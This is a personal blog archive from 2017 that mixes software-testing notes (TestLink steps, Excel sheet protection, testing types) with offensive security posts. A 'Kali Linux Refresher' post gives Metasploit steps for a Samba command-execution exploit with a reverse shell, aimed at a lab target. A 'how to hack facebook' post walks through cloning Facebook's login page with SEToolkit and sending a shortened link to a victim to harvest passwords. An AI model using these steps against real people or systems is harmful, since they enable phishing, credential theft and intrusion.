Friday, April 21, 2017

Firefox Proxy

Firefox proxy
HTTP Proxy: 127.0.0.1: 8080
No Proxy for:
localhost, 127.0.0.1

Linux Update Root Password

vim /etc/ss
vim /etc/ssh/sshd_config
edit Esc:
wq!
service ssh restart

Kali Linux Refresher

Kali Linux Refresher
how to discover target
===========================
*don't know ip address yet
===========================
>netdiscover -r ipaddress
>netdiscover only
Note : Mac Vendor with CADMUS COMPUTER SYSTEMS are the target
 list target
 192.168.1.241 Metasploitable 2 linux
 192.168.1.236
 192.168.1.120

web.archived.org

===========================
Run nmap in metaexploit
===========================
>msfconsole
>db_status(check if status is connected)
>workspace
>msfdb init(enrypt database)
>msfdb
>service postgresql status(if active)
open another metaexploit terminal
>msfconsole
>workspace -a refresher(to add)
>workspace
target ip now
>db_nmap -v -sV -A -O 192.168.1.236
Open another terminal
>nikto -host http://192.168.1.236
 note: find cgi-bin
 open browser and type 192.168.1.236/cgi-bin
 review nikto logs where u can find exploitable details from directory

---Scanning tools------
vega
nikto
openvas

===========================
to test wordpress
===========================
open another terminal
>wpscan --url http://192.168.1.236/wordpress


======================================================
check all active directory folder from server(solution secure apache server)
======================================================
>dirb http://192.168.1.236

==============================================
Samba Username map script Command execution
==============================================
>use exploit/multi/samba/usermap_script
>show options
>set RHOST <Target IP>
>show payloads
>set PAYLOAD cmd/unix/reverse
>show options
>set LHOST <Kali IP>
>exploit
you can now execute shell linux commands
>-
>id

Note:
search addtional
exploitable linux guid
www.vulnhub.com()

Harvester Attack

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                 
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
       
          set:webattack>Enter the url to clone: www.fb.com

 
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW.

8.move file to html folder
9.go to tinyurl.com and paste ur ip address
10.copy url link generated and send it to the target through gmail.

Tags:
#hackfb #kalilinux #kali #socialengineering #credentialharvesterattack

Reference:
Youtube : https://www.youtube.com/watch?v=yUuwnu-NUXE
Article : http://www.kalitutorials.net/2016/08/how-to-hack-facebook-using-kali-linux.html

Protect Column in MS Excel

This tutorial can help you how to un protect and protect specific column(s) or cell in Microsoft Excel.

Step to follow:

Step1. Excel file already open.
step2. on your keyboard press Ctrl+ A to select all cells
step3. on your mouse click right hand button
step4. select Format Cells..
step5. on Format Cells prompt box facility option click "Protection" tab
step6. tick "Locked" checkbox and click OK button
step7. select specific cell(s) or column(s) to unprotect by highlighting through mouse
step8. on your mouse click right hand button again
step9. select Format Cells..
step10. on Format Cells prompt box facility option click "Protection" tab
step11. unticked Locked checbox to unlocked selected cell(s) or column(s) from step 7.
step12. select tab sheet from lower section and click mouse right hand button and click Protect Sheet
step13. On Protect Sheet prompt option facility, unticked Select locked cells checkbox
step14. On Password to unprotect sheet text field enter desire password and click Ok button

Expected results: Unlocked Cell(s) or Column(s) should be editable and the rest should not be editable

Tags: #exceltips #MSExcel #excel

Thursday, April 20, 2017

Type of Software Testing

Type of Software Testing Template Format
Tags: #smoketesting #sanitytest #STLC #regressiontesting #softwaretesting

Website Template Format.

Below image displayed website Template Format Name Convention

Tags: #WebTemplate #WebDesign #TestCaseDesign #TestCaseReference #SDLC #STLC

Software Quality Triangle


Tags:
QA, Software Testing, Quality Assurance

Usable Links

Usable Links

Below are list of usable links:

Test Link Manual

Test Link : how to use it?

A.Create Project
  1.Go to Home:Test Project>Test Project Management
  2.Click Create Button, fill out all fields and click Create button

B.Create Test Plan
  1.Go to Test Plan>Test Plan Management
  2.Click Create button, fill out all fields and click Create button

C.Create Builds/Releases
  1.Go to Test Plan>Builds/Releases
  2.Click Create button, fill out all fields and click Create button

D.Create Test Suite
  1.Go to Test Specificiation>Action>Test Suite Operations:Create
  2.Fill out all fields and click Save button

E.Create Test Case
  1.Go to Test Specification, then select Test Suite
  2.Test Suite>Action>Test Case Operation:Create
  3.Fill out all fields and click Create

F.Create step to Test Case
  1.Go to Test Specification, then select Test Suite
  2.Select Test Case, Click Create step button
  3.Fill out Steps fields and click Save button

G.Add Test Case to Test Plans
  1.Go to Test Specification, then select Test Suite
  2.Select Test Case,click Action, then click Add to Test Plans button
  3.Select Test Plan and click Add button

H.Assign Test Case Execution
  1.Go to Test Plan contents>Assign Test Case Execution
  2.Select Test Case add to User and click save

Tags: #testlink #testmanagement #STLC #testcase #testcasedesign